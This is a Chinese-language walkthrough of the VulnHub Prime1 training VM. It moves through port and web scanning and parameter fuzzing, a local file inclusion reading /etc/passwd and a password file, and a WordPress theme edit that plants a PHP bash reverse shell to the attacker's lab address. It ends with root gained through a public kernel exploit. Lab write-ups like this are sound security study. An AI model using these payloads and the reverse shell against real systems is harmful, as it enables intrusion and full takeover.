[vulnhub]Prime1

https://www.vulnhub.com/entry/prime-1,358/

主機發現埠掃描

1. 探測存活主機，137是靶機

   nmap -sP 192.168.75.0/24 
   //                       
   Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 16:25 CST
   Nmap scan report for 192.168.75.1
   Host is up (0.00028s latency).
   MAC Address: 00:50:56:C0:00:08 (VMware)
   Nmap scan report for 192.168.75.2
   Host is up (0.00026s latency).
   MAC Address: 00:50:56:FB:CA:45 (VMware)
   Nmap scan report for 192.168.75.137
   Host is up (0.0010s latency).
   MAC Address: 00:0C:29:69:EE:71 (VMware)
   Nmap scan report for 192.168.75.254
   Host is up (0.00018s latency).
   MAC Address: 00:50:56:F8:B3:1A (VMware)
   Nmap scan report for 192.168.75.131
   Host is up.
   

2. 掃描靶機所有開放埠

   nmap -sT -min-rate 10000 -p- 192.168.75.137        
   //                   
   Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:54 CST
   Nmap scan report for 192.168.75.137
   Host is up (0.0014s latency).
   Not shown: 65533 closed tcp ports (conn-refused)
   PORT   STATE SERVICE
   22/tcp open  ssh
   80/tcp open  http
   MAC Address: 00:0C:29:69:EE:71 (VMware)
   

3. 掃描服務版本及系統版本

   nmap -sT -sV -O -p22,80 192.168.75.137           
   //                     
   Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:57 CST
   Nmap scan report for 192.168.75.137
   Host is up (0.00045s latency).
   
   PORT   STATE SERVICE VERSION
   22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
   80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
   MAC Address: 00:0C:29:69:EE:71 (VMware)
   Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
   Device type: general purpose
   Running: Linux 3.X|4.X
   OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
   OS details: Linux 3.2 - 4.9
   Network Distance: 1 hop
   Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
   
   

4. udp掃描

   nmap -sU 192.168.75.137  
   //                       
   Starting Nmap 7.93 ( https://nmap.org ) at 2024-09-22 17:57 CST
   Nmap scan report for 192.168.75.137
   Host is up (0.00073s latency).
   Not shown: 997 closed udp ports (port-unreach)
   PORT     STATE         SERVICE
   68/udp   open|filtered dhcpc
   631/udp  open|filtered ipp
   5353/udp open|filtered zeroconf
   MAC Address: 00:0C:29:69:EE:71 (VMware)
   

5. 掃描漏洞

   nmap -script=vuln -p 22,80, 192.168.75.137       
   //
   PORT   STATE SERVICE
   22/tcp open  ssh
   80/tcp open  http
   |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
   | http-slowloris-check: 
   |   VULNERABLE:
   |   Slowloris DOS attack
   |     State: LIKELY VULNERABLE
   |     IDs:  CVE:CVE-2007-6750
   |       Slowloris tries to keep many connections to the target web server open and hold
   |       them open as long as possible.  It accomplishes this by opening connections to
   |       the target web server and sending a partial request. By doing so, it starves
   |       the http server's resources causing Denial Of Service.
   |       
   |     Disclosure date: 2009-09-17
   |     References:
   |       http://ha.ckers.org/slowloris/
   |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
   |_http-csrf: Couldn't find any CSRF vulnerabilities.
   |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
   | http-enum: 
   |   /wordpress/: Blog
   |_  /wordpress/wp-login.php: Wordpress login page.
   |_http-dombased-xss: Couldn't find any DOM based XSS.
   MAC Address: 00:0C:29:69:EE:71 (VMware)
   

   掃描出 slowloris DOS用不上，以及cve2017-1001000 ，並且掃出存在wordpress 版本是<4.7.2的，因為能掃描出cve2017-1001000

6. Nikto漏洞掃描

   nikto -host 192.168.75.137 -port 22,80
   //
   - Nikto v2.5.0
   ---------------------------------------------------------------------------
   ---------------------------------------------------------------------------
   + Target IP:          192.168.75.137
   + Target Hostname:    192.168.75.137
   + Target Port:        80
   + Start Time:         2024-09-22 18:44:45 (GMT8)
   ---------------------------------------------------------------------------
   + Server: Apache/2.4.18 (Ubuntu)
   + /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozill.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
   + /: The X-Content-Type-Options header is not set. This could allow the user agent to render th content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/wb-vulnerability-scanner/vulnerabilities/missing-content-type-header/
   + No CGI Directories found (use '-C all' to force check all possible dirs)
   + Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is th EOL for the 2.x branch.
   + /: Web Server returns a valid response with junk HTTP methods which may cause false positives
   + /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/                                                                           
   + /wordpress/wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version.                                                
   + /wordpress/wp-links-opml.php: This WordPress script reveals the installed version.           
   + /wordpress/wp-admin/: Uncommon header 'x-redirect-by' found, with contents: WordPress.       
   + /wordpress/: Drupal Link header found with value: <http://192.168.75.137/wordpress/index.php?rest_route=/>; rel="https://api.w.org/". See: https://www.drupal.org/                          
   + /wordpress/: A Wordpress installation was found.
   + /wordpress/wp-login.php?action=register: Cookie wordpress_test_cookie created without the httponly flag. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies
   + /wordpress/wp-content/uploads/: Directory indexing found.
   + /wordpress/wp-content/uploads/: Wordpress uploads directory is browsable. This may reveal sensitive information.
   + /wordpress/wp-login.php: Wordpress login found.
   + 8106 requests: 0 error(s) and 14 item(s) reported on remote host
   + End Time:           2024-09-22 18:45:09 (GMT8) (24 seconds)
   ---------------------------------------------------------------------------
   + 1 host(s) tested
   
   

web滲透

1. 爆破目錄，192.168.75.137

   [18:49:23] 200 -  131B  - /dev
   [18:49:25] 200 -  137B  - /image.php
   [18:49:26] 301 -  321B  - /javascript  ->  http://192.168.75.137/javascript/
   [18:49:32] 403 -  279B  - /server-status/
   [18:49:32] 403 -  279B  - /server-status
   [18:49:36] 200 -    1KB - /wordpress/wp-login.php
   [18:49:36] 200 -    4KB - /wordpress/
   

   檢視/dev ，因為它不是一個正常該有的目錄

   hello,
   
   now you are at level 0 stage.
   
   In real life pentesting we should use our tools to dig on a web very hard.
   
   Happy hacking. 
   

   意思是讓我們更努力的去爆破目錄？

2. python .\dirsearch.py -u http://192.168.75.137/ --suffixes .txt,.zip 給字典加上.txt,.zip 字尾去爆破

   http://192.168.75.137/secret.txt
   

   檢視內容得出

   Looks like you have got some secrets.
   
   Ok I just want to do some help to you. 
   
   Do some more fuzz on every page of php which was finded by you. And if
   you get any right parameter then follow the below steps. If you still stuck 
   Learn from here a basic tool with good usage for OSCP.
   
   https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
   
   //see the location.txt and you will get your next move//
   

   讓我們進行fuzz爆破，大概意思是讓我們在所有php檔案進行fuzz ，大概就是讓我們fuzz出get引數

3. 掃描出所有php檔案

   irb http://192.168.75.137 -X .php               
   
   -----------------
   DIRB v2.22    
   By The Dark Raver
   -----------------
   
   START_TIME: Sun Sep 22 20:12:05 2024
   URL_BASE: http://192.168.75.137/
   WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
   EXTENSIONS_LIST: (.php) | (.php) [NUM = 1]
   
   -----------------
   
   GENERATED WORDS: 4612                                                          
   
   ---- Scanning URL: http://192.168.75.137/ ----
   + http://192.168.75.137/image.php (CODE:200|SIZE:147)                                                                                      
   + http://192.168.75.137/index.php (CODE:200|SIZE:136)                                                                                      
                                                                                                                                              
   -----------------
   END_TIME: Sun Sep 22 20:12:08 2024
   DOWNLOADED: 4612 - FOUND: 2
   

   當前目錄下只有兩個php檔案我們兩個都試試

4. 對index.php進行fuzz

   注意 --hh 136 需要對視情況進行調整，過濾掉其他結果後，最後得出file這個引數

   wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.75.137/index.php?FUZZ=something
   //hh 過濾掉了 字長為136的資料
   ********************************************************
   * Wfuzz 3.1.0 - The Web Fuzzer                         *
   ********************************************************
   
   Target: http://192.168.75.137/index.php?FUZZ=something
   Total requests: 951
   
   =====================================================================
   ID           Response   Lines    Word       Chars       Payload                       
   =====================================================================
   
   000000341:   200        7 L      19 W       206 Ch      "file"                        
   
   Total time: 1.060608
   Processed Requests: 951
   Filtered Requests: 950
   Requests/sec.: 896.6547
   
   

5. 訪問http://192.168.75.137/index.php?file=

   提示：Do something better you are digging wrong file
   

   可能file的引數也需要我們進行fuzz，其實這事burp也可以做

   但是之前的secret.txt還有一句 : //see the location.txt and you will get your next move//

   所以我們訪問 ：http://192.168.75.137/index.php?file=location.txt

   果然存在有資訊

   Now dig some more for next one
   use 'secrettier360' parameter on some other php page for more fun. 
   

   讓我們使用secrettier360 引數去別的php頁面fuzz ，大概是

   別的php頁面除了index.php那就是image.php

6. 對image.php 進行fuzz

   wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 197 http://192.168.75.137/image.php?secrettier360=FUZZ
   ********************************************************
   * Wfuzz 3.1.0 - The Web Fuzzer                         *
   ********************************************************
   
   Target: http://192.168.75.137/image.php?secrettier360=FUZZ
   Total requests: 951
   
   =====================================================================
   ID           Response   Lines    Word       Chars       Payload                       
   =====================================================================
   
   000000257:   200        13 L     43 W       328 Ch      "dev"                         
   
   Total time: 1.031432
   Processed Requests: 951
   Filtered Requests: 950
   Requests/sec.: 922.0189
   

   得出引數dev ，嘗試訪問：http://192.168.75.137/image.php?secrettier360=dev

   finaly you got the right parameter
   
   hello, now you are at level 0 stage. In real life pentesting we should use our tools to dig on a web very hard. Happy hacking. 
   

   WTF？這不是之前的/dev嗎，但是發現你只要在secrettier360 加上檔名，那不就是檔案包含了嗎?我這裡大發奇想使用php偽協議嘗試，但是發現使用不了，應該是禁用了

7. 利用檔案包含漏洞

   嘗試讀取/etc/passwd

   http://192.168.75.137/image.php?secrettier360=../../../etc/passwd
   //
   root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin 
   bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin 
   sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin 
   man:x:6:12:man:/var/cache/man:/usr/sbin/nologin 
   lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin 
   mail:x:8:8:mail:/var/mail:/usr/sbin/nologin 
   news:x:9:9:news:/var/spool/news:/usr/sbin/nologin 
   uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin 
   proxy:x:13:13:proxy:/bin:/usr/sbin/nologin 
   www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin 
   backup:x:34:34:backup:/var/backups:/usr/sbin/nologin 
   list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin 
   irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin 
   gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin 
   nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin 
   systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false 
   systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false 
   systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false 
   systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false 
   syslog:x:104:108::/home/syslog:/bin/false 
   _apt:x:105:65534::/nonexistent:/bin/false 
   messagebus:x:106:110::/var/run/dbus:/bin/false 
   uuidd:x:107:111::/run/uuidd:/bin/false 
   lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false 
   whoopsie:x:109:117::/nonexistent:/bin/false 
   avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false 
   avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false 
   dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false 
   colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false 
   speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false 
   hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false 
   kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false 
   pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false 
   rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false 
   saned:x:119:127::/var/lib/saned:/bin/false 
   usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false 
   victor:x:1000:1000:victor,,,:/home/victor:/bin/bash 
   mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false 
   saket:x:1001:1001:find password.txt file in my directory:/home/saket: 
   sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin 
   

   發現saket:x:1001:1001:find password.txt file in my directory:/home/saket: ，好好好

   http://192.168.75.137/image.php?secrettier360=../../../home/saket/password.txt
   //
   finaly you got the right parameter
   
   follow_the_ippsec 
   

   密碼應該是follow_the_ippsec

8. 登入wordpress後臺，使用者名稱victor，密碼follow_the_ippsec

   為什麼使用者名稱是victor ，因為wordpress/index.php裡面第一條資訊就是victor 釋出的，所以猜測使用者名稱是victor ，成功進入後臺

後臺利用獲得初級shell

1. 進入後臺，plugins → Add New → upload plugins ,上傳反彈shell檔案

   

   發現沒有上傳許可權，即使設定關閉了以月份建立資料夾

2. 尋找別的地方上傳shellcode

   在Appearance→Theme Editor →secret.php 找到了可編輯儲存的檔案

   我們將shellcode輸進去

   <?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.75.131/1234 0>&1'");?>
   

   然後save

3. kali開啟監聽，並且訪問

   http://192.168.75.137/wordpress/wp-content/themes/twentynineteen/secret.php
   

   nc -lvp 1234                          
   listening on [any] 1234 ...
   192.168.75.137: inverse host lookup failed: Unknown host
   connect to [192.168.75.131] from (UNKNOWN) [192.168.75.137] 42312
   bash: cannot set terminal process group (48712): Inappropriate ioctl for device
   bash: no job control in this shell
   www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ 
   

   獲得初級shell

提權

1. 檢視許可權

   www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ sudo -l                    
   Matching Defaults entries for www-data on ubuntu:
       env_reset, mail_badpass,
       secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
   User www-data may run the following commands on ubuntu:
       (root) NOPASSWD: /home/saket/enc
   //
   www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ uname -a              
   Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
   

   www-data 使用者被授予了在 Ubuntu 系統上以 root 許可權執行 /home/saket/enc 命令，而無需輸入密碼

   /home/saket/enc：這是一個具體的可執行檔案或指令碼的路徑，www-data 使用者可以以 root 身份執行它

   但是enc發現執行時還是需要輸入密碼，嘗試利用別的

2. 嘗試核心漏洞

   searchsploit linux kernel 4.10.0-28 | grep 'Local Privilege'
   Linux Kernel (Solaris 10 / < 5.10 138888-01) - Local Privilege Escalation                                 | solaris/local/15962.c
   Linux Kernel 2.6.19 < 5.9 - 'Netfilter Local Privilege Escalation                                         | linux/local/50135.c
   Linux Kernel 4.10 < 5.1.17 - 'PTRACE_TRACEME' pkexec Local Privilege Escalation                           | linux/local/47163.c
   Linux Kernel 4.8.0 UDEV < 232 - Local Privilege Escalation                                                | linux/local/41886.c
   Linux Kernel < 4.11.8 - 'mq_notify: double sock_put()' Local Privilege Escalation                         | linux/local/45553.c
   Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation                             | linux/local/45010.c
   

   嘗試最後一個 45010.c 然後把45010.c傳到靶機，編譯執行,記得給執行許可權

   gcc 45010.c -o 45010
   chmod u+x 45010
   ./45010
   

   www-data@ubuntu:/tmp$ ./45010
   //
   uname -a
   Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
   //
   whoami 
   root
   

   提權成功，讀取flag檔案

   python -c "import pty;pty.spawn('/bin/bash')"    
   //
   root@ubuntu:/tmp# cd /root
   root@ubuntu:/root# ls
   enc  enc.cpp  enc.txt  key.txt  root.txt  sql.py  t.sh  wfuzz  wordpress.sql
   //
   root@ubuntu:/root# cat key.txt
   

   I know you are the fan of ippsec.
   
   So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.